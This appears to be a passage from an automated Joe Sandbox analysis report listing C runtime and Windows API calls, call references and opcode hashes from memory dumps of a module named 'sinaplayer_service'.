                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalEnterSection_getptd_lockfree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2954757286-0
                                                                                                                                                                                                    • Opcode ID: 4161715d615d2c355949f888b0edd93b1580a8a6f99dfd309199d23f09d583bc
                                                                                                                                                                                                    • Instruction ID: 28e0e02e6f9c3e4ea47afd97dea9a2ec021c9726b319149f7c3848aa0780168c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4161715d615d2c355949f888b0edd93b1580a8a6f99dfd309199d23f09d583bc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23118272D957229BFB81DF68940072E7BB4FB05720B51415AF870EB284CBB4A942DFC2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0F84D0
                                                                                                                                                                                                    • ??0event@Concurrency@@QAE@XZ.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000004), ref: 6D0F8500
                                                                                                                                                                                                      • Part of subcall function 6D0EB72C: ??0critical_section@Concurrency@@QAE@XZ.MSVCR120(00000000,6D0F86D2,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?,?,6D0F9215), ref: 6D0EB73C
                                                                                                                                                                                                    • ?set@event@Concurrency@@QAEXXZ.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000004), ref: 6D0F8549
                                                                                                                                                                                                    • Concurrency::details::ContextBase::CreateWorkQueue.LIBCMT ref: 6D0F8560
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency@@$??0critical_section@??0event@?set@event@Base::Concurrency::details::ContextCreateH_prolog3QueueWork
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 639136014-0
                                                                                                                                                                                                    • Opcode ID: dfc434d4f806aecfd44a8b745ccef3eb9739b52a0124f9115378a531915d6e40
                                                                                                                                                                                                    • Instruction ID: 7102d4c221b1fe91a02b2e5ac44c600106617567c296469db02444160dec7f47
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dfc434d4f806aecfd44a8b745ccef3eb9739b52a0124f9115378a531915d6e40
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A92129B0904B018FE365CF39C14076AB7F0BF44714F21891EC5AA8BA50EB74E545CB84
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0A3D40
                                                                                                                                                                                                    • ??0SchedulerPolicy@Concurrency@@QAA@IZZ.MSVCR120(6D0948CA,00000000,0000000C,6D0A3E4B,?,00000000,?,6D0A3A7E,?,6D0948CA), ref: 6D0A3D69
                                                                                                                                                                                                    • memcpy.MSVCR120(6D0948CA,00000000,00000028,0000000C,6D0A3E4B,?,00000000,?,6D0A3A7E,?,6D0948CA), ref: 6D0D3017
                                                                                                                                                                                                      • Part of subcall function 6D0A6A07: __EH_prolog3.LIBCMT ref: 6D0A6A0E
                                                                                                                                                                                                      • Part of subcall function 6D0A6A07: ??2@YAPAXI@Z.MSVCR120(00000210,0000000C,6D0A3D89,0000000C,6D0A3E4B,?,00000000,?,6D0A3A7E,?,6D0948CA), ref: 6D0A6A75
                                                                                                                                                                                                      • Part of subcall function 6D0A4FC6: ?GetProcessorNodeCount@Concurrency@@YAIXZ.MSVCR120(E18D5491,?,00000180,?), ref: 6D0A5027
                                                                                                                                                                                                      • Part of subcall function 6D0A4FC6: ??_U@YAPAXI@Z.MSVCR120(00000000,E18D5491,?,00000180,?), ref: 6D0A5059
                                                                                                                                                                                                      • Part of subcall function 6D0A4FC6: ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6D0A50A3
                                                                                                                                                                                                      • Part of subcall function 6D0A4FC6: ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6D0A50BB
                                                                                                                                                                                                      • Part of subcall function 6D0A4FC6: memset.MSVCR120(?,00000000,?), ref: 6D0A50D1
                                                                                                                                                                                                    • free.MSVCR120(6D0948CA,?,6D0948CA), ref: 6D0A3DA3
                                                                                                                                                                                                      • Part of subcall function 6D08ECE0: HeapFree.KERNEL32(00000000,00000000,?,6D0D3D3A,00000000,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D08ECF4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency@@H_prolog3$??2@Count@FreeHeapNodePolicy@ProcessorSchedulerfreememcpymemset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3530969603-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • realloc.MSVCR120(00000000,00000002,00000000,005C2A20,00000000,?,6D1202D9,00000000,005C2D90,00000002,005C2A20,00000000,?,6D0E070E,00000004,00000002), ref: 6D09F44F
                                                                                                                                                                                                    • memset.MSVCR120(00000000,00000000,00000002,00000000,005C2A20,00000000,?,6D1202D9,00000000,005C2D90,00000002,005C2A20,00000000,?,6D0E070E,00000004), ref: 6D09F469
                                                                                                                                                                                                    • _errno.MSVCR120(005C2A20,00000000,?,6D1202D9,00000000,005C2D90,00000002,005C2A20,00000000,?,6D0E070E,00000004,00000002,005C2D90,00000000,00000000), ref: 6D0DDBB6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errnomemsetrealloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2569514189-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6D0ACFFF
                                                                                                                                                                                                    • __AdjustPointer.MSVCR120(00000000,00000009,00000004,6D0AD125,00000000,?,00000001,?), ref: 6D0AD02E
                                                                                                                                                                                                    • __AdjustPointer.MSVCR120(00000000,00000009,00000001,00000004,6D0AD125,00000000,?,00000001,?), ref: 6D0D3978
                                                                                                                                                                                                    • memcpy.MSVCR120(?,00000000,00000003,00000004,6D0AD125,00000000,?,00000001,?,?,00000001), ref: 6D0D399F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AdjustPointer$H_prolog3_catchmemcpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 738859832-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0F87D6
                                                                                                                                                                                                      • Part of subcall function 6D094872: TlsGetValue.KERNEL32(?,6D0948CA,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D09488E
                                                                                                                                                                                                    • Concurrency::details::ContextBase::CreateWorkQueue.LIBCMT ref: 6D0F87ED
                                                                                                                                                                                                      • Part of subcall function 6D0EA0F6: __EH_prolog3.LIBCMT ref: 6D0EA0FD
                                                                                                                                                                                                      • Part of subcall function 6D0EA0F6: InterlockedPopEntrySList.KERNEL32(?,00000004,6D0F8775,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?,?,6D0F9215), ref: 6D0EA11A
                                                                                                                                                                                                      • Part of subcall function 6D0EA0F6: ??2@YAPAXI@Z.MSVCR120(00000074,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?,?,6D0F9215,?,?), ref: 6D0EA134
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000090,?,00000004,6D0F931D,?,?,6D0E923C,?,?,6D0F9215,?,?), ref: 6D0F8826
                                                                                                                                                                                                    • Concurrency::details::_TaskCollection::_TaskCollection.LIBCMT ref: 6D0F883B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@H_prolog3Task$Base::CollectionCollection::_Concurrency::details::Concurrency::details::_ContextCreateEntryInterlockedListQueueValueWork
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1426128297-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __crtGetUserDefaultLocaleName.MSVCR120(?,00000055,0000009C), ref: 6D0A8415
                                                                                                                                                                                                    • wcslen.MSVCR120(?,0000009C), ref: 6D0A8428
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,00000055,?,00000001,?,0000009C), ref: 6D0A843F
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0000009C), ref: 6D0E044F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DefaultLocaleNameUser__crt_invoke_watsonwcslenwcsncpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2957291394-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,6D0AEA10,0000000C,6D0AEA44,Function_0001D315,?,?,00000000,?), ref: 6D0AE9CC
                                                                                                                                                                                                      • Part of subcall function 6D094B96: _lock.MSVCR120(?), ref: 6D094BC1
                                                                                                                                                                                                      • Part of subcall function 6D0A0477: _fileno.MSVCR120(?,?,?,6D0A07F9,-00000020,6D0A0850,00000010), ref: 6D0A047F
                                                                                                                                                                                                      • Part of subcall function 6D0A0477: _isatty.MSVCR120(00000000,?,?,?,6D0A07F9,-00000020,6D0A0850,00000010), ref: 6D0A0485
                                                                                                                                                                                                      • Part of subcall function 6D0A0477: __p__iob.MSVCR120(0000FFFF,?,?,6D0A07F9,-00000020,6D0A0850,00000010), ref: 6D0A0491
                                                                                                                                                                                                      • Part of subcall function 6D0A0477: __p__iob.MSVCR120(0000FFFF,?,?,6D0A07F9,-00000020,6D0A0850,00000010), ref: 6D0A04A1
                                                                                                                                                                                                    • __ftbuf.LIBCMT ref: 6D0AE9F2
                                                                                                                                                                                                      • Part of subcall function 6D0AE98E: _unlock_file.MSVCR120(?,6D0AEA06), ref: 6D0AE98F
                                                                                                                                                                                                    • _errno.MSVCR120(6D0AEA10,0000000C,6D0AEA44,Function_0001D315,?,?,00000000,?), ref: 6D0D5CBA
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D0AEA10,0000000C,6D0AEA44,Function_0001D315,?,?,00000000,?), ref: 6D0D5CC5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __p__iob$__ftbuf_errno_fileno_invalid_parameter_noinfo_isatty_lock_lock_file_unlock_file
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 169382274-0
                                                                                                                                                                                                    • Opcode ID: a57e7c8181beb771239b13eb497ba1e354c03839f4e2a959374573af000ae333
                                                                                                                                                                                                    • Instruction ID: d63d5bea199cbda697e13e256af15c09adb4eb83f364097dee5a8f0e4fce4979
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a57e7c8181beb771239b13eb497ba1e354c03839f4e2a959374573af000ae333
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA01A271A0430AABFB019FB18C05BBF36B0BF45368F058528F920DB291DB38C5119B61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock.MSVCR120(00000001), ref: 6D0B4345
                                                                                                                                                                                                      • Part of subcall function 6D08EDD7: EnterCriticalSection.KERNEL32(?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D08EDF3
                                                                                                                                                                                                    • fclose.MSVCR120(6D15E000), ref: 6D0D5369
                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(6D15DFE0), ref: 6D0D5389
                                                                                                                                                                                                    • free.MSVCR120(005C7910), ref: 6D0D5397
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$DeleteEnter_lockfclosefree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1929256606-0
                                                                                                                                                                                                    • Opcode ID: d3f8c279803425815de333c4fb52fa1fbd4b2310a3bc0290e9279e924dd0163b
                                                                                                                                                                                                    • Instruction ID: f9f4269c6cefc2c6f25cdb53f225a85273d8b84aec034ea596577d48e7ab9347
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3f8c279803425815de333c4fb52fa1fbd4b2310a3bc0290e9279e924dd0163b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF018075818312DBEB01CB99D848F6DB7B0EF57324B520546E9719B191C7B4C4828B41
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0F8436
                                                                                                                                                                                                    • ??0event@Concurrency@@QAE@XZ.MSVCR120(?,?,?,?,?,00000004), ref: 6D0F845F
                                                                                                                                                                                                      • Part of subcall function 6D0EB72C: ??0critical_section@Concurrency@@QAE@XZ.MSVCR120(00000000,6D0F86D2,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?,?,6D0F9215), ref: 6D0EB73C
                                                                                                                                                                                                      • Part of subcall function 6D094872: TlsGetValue.KERNEL32(?,6D0948CA,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D09488E
                                                                                                                                                                                                    • ?set@event@Concurrency@@QAEXXZ.MSVCR120(?,?,?,?,?,00000004), ref: 6D0F8493
                                                                                                                                                                                                      • Part of subcall function 6D0EB922: __EH_prolog3_GS.LIBCMT ref: 6D0EB929
                                                                                                                                                                                                      • Part of subcall function 6D0EB922: ??0scoped_lock@critical_section@Concurrency@@QAE@AAV12@@Z.MSVCR120(?,00000044,6D0F8727,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?,?,6D0F9215), ref: 6D0EB950
                                                                                                                                                                                                      • Part of subcall function 6D0EB922: std::exception::exception.LIBCMT(?,00000001,?,00000044,6D0F8727,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?), ref: 6D0EB9D7
                                                                                                                                                                                                      • Part of subcall function 6D0EB922: _CxxThrowException.MSVCR120(?,6D0AC7FC,?,00000001,?,00000044,6D0F8727,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?), ref: 6D0EB9EC
                                                                                                                                                                                                      • Part of subcall function 6D0EB922: ?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR120(?,00000044,6D0F8727,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?,?,6D0F9215), ref: 6D0EBA39
                                                                                                                                                                                                      • Part of subcall function 6D0EB922: _freea_s.MSVCR120(?,?,00000044,6D0F8727,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?), ref: 6D0EBA50
                                                                                                                                                                                                      • Part of subcall function 6D0A3AF4: TlsGetValue.KERNEL32(6D0A3DF7,00000000,00000000,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D0A3AFA
                                                                                                                                                                                                    • Concurrency::details::ContextBase::CreateWorkQueue.LIBCMT ref: 6D0F84A9
                                                                                                                                                                                                      • Part of subcall function 6D0EA0F6: __EH_prolog3.LIBCMT ref: 6D0EA0FD
                                                                                                                                                                                                      • Part of subcall function 6D0EA0F6: InterlockedPopEntrySList.KERNEL32(?,00000004,6D0F8775,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?,?,6D0F9215), ref: 6D0EA11A
                                                                                                                                                                                                      • Part of subcall function 6D0EA0F6: ??2@YAPAXI@Z.MSVCR120(00000074,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?,?,6D0F9215,?,?), ref: 6D0EA134
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency@@$H_prolog3Value$??0critical_section@??0event@??0scoped_lock@critical_section@??2@?set@event@?unlock@critical_section@Base::Concurrency::details::ContextCreateEntryExceptionH_prolog3_InterlockedListQueueThrowV12@@Work_freea_sstd::exception::exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3177246685-0
                                                                                                                                                                                                    • Opcode ID: 9f8ca712344a6ff21877f5d06c4a17be7f13941749e34f415dfb9850d5226998
                                                                                                                                                                                                    • Instruction ID: 5fb5a399ba4a89c28126e6604dd718f2f55498ca1cbd6f7819464ea4e7225a95
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f8ca712344a6ff21877f5d06c4a17be7f13941749e34f415dfb9850d5226998
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D81105B0A04B02AFD704DF3AC180658FBF0BF48314BA1962EC2698BB50DB74E560DF84
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,?,00000000,?,6D0D3D52,6D0ACA91,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0FBCC8
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,00000000,?,6D0D3D52,6D0ACA91,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0FBCCF
                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(6D15FCB0,00000000,?,6D0D3D52,6D0ACA91,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0FBCF1
                                                                                                                                                                                                    • __crtFlsFree.MSVCR120(00000007,6D0D3D52,6D0ACA91,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0FBD16
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalDeleteSection$Free__crtfree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2230536912-0
                                                                                                                                                                                                    • Opcode ID: 15a2b398757a3fc5e916cb55c3a3f80e41c086d220438ad96c5c47f3e71a260d
                                                                                                                                                                                                    • Instruction ID: c444ea5f4bb809b85d3a5a18b97210b97cf1bfd69b7a3b7e7978e777bd6cc4d5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15a2b398757a3fc5e916cb55c3a3f80e41c086d220438ad96c5c47f3e71a260d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0DF022B6401203CBEB100B19A98872B77AABB42235B31422AED7493194CF788482CED0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _getptd.MSVCR120(6D092CF0,0000000C), ref: 6D092C9B
                                                                                                                                                                                                    • _lock.MSVCR120(0000000C,6D092CF0,0000000C), ref: 6D092CB3
                                                                                                                                                                                                      • Part of subcall function 6D08EDD7: EnterCriticalSection.KERNEL32(?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D08EDF3
                                                                                                                                                                                                      • Part of subcall function 6D092D0C: _unlock.MSVCR120(0000000C,6D092CDF,0000000C), ref: 6D092D0E
                                                                                                                                                                                                    • _getptd.MSVCR120(6D092CF0,0000000C), ref: 6D0DF3D2
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd$CriticalEnterSection_lock_unlock
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2319614578-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,?,?,?,?,?,?,6D0AFE20,0000000C), ref: 6D0AFDEA
                                                                                                                                                                                                      • Part of subcall function 6D094B96: _lock.MSVCR120(?), ref: 6D094BC1
                                                                                                                                                                                                    • _fseek_nolock.MSVCR120(?,?,?,?,?,?,?,?,?,6D0AFE20,0000000C), ref: 6D0AFDF9
                                                                                                                                                                                                      • Part of subcall function 6D0AFE3C: _fileno.MSVCR120(?,?,?,?,?,?,?,6D0AFDFE,?,?,?), ref: 6D0AFE82
                                                                                                                                                                                                      • Part of subcall function 6D0AFE3C: _lseek.MSVCR120(00000000,?,?,?,?,?,?,6D0AFDFE,?,?,?), ref: 6D0AFE89
                                                                                                                                                                                                      • Part of subcall function 6D0AFDB4: _unlock_file.MSVCR120(?,6D0AFE12), ref: 6D0AFDB5
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,?,6D0AFE20,0000000C), ref: 6D0D5676
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,?,?,6D0AFE20,0000000C), ref: 6D0D5681
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_fileno_fseek_nolock_invalid_parameter_noinfo_lock_lock_file_lseek_unlock_file
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4149153117-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,?,?,?,?,?,?,6D0AF878,0000000C), ref: 6D0AF83D
                                                                                                                                                                                                    • _fwrite_nolock.MSVCR120(?,00000000,00000000,?,?,?,?,?,?,?,6D0AF878,0000000C), ref: 6D0AF851
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _fwrite_nolock_lock_file
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3764063476-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::MeasuredHistory::Variance.LIBCMT ref: 6D0EED20
                                                                                                                                                                                                    • _CIsqrt.MSVCR120(00000000), ref: 6D0EED25
                                                                                                                                                                                                    • _CIsqrt.MSVCR120(00000000), ref: 6D0EED36
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::MeasuredHistory::Mean.LIBCMT ref: 6D0EED43
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Climbing::Concurrency::details::HillHistory::IsqrtMeasured$MeanVariance
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4254205323-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D08EDF3
                                                                                                                                                                                                    • __amsg_exit.LIBCMT(00000011,?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D0D3BBA
                                                                                                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 6D0D3BC9
                                                                                                                                                                                                    • _errno.MSVCR120(6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D0D3BDC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
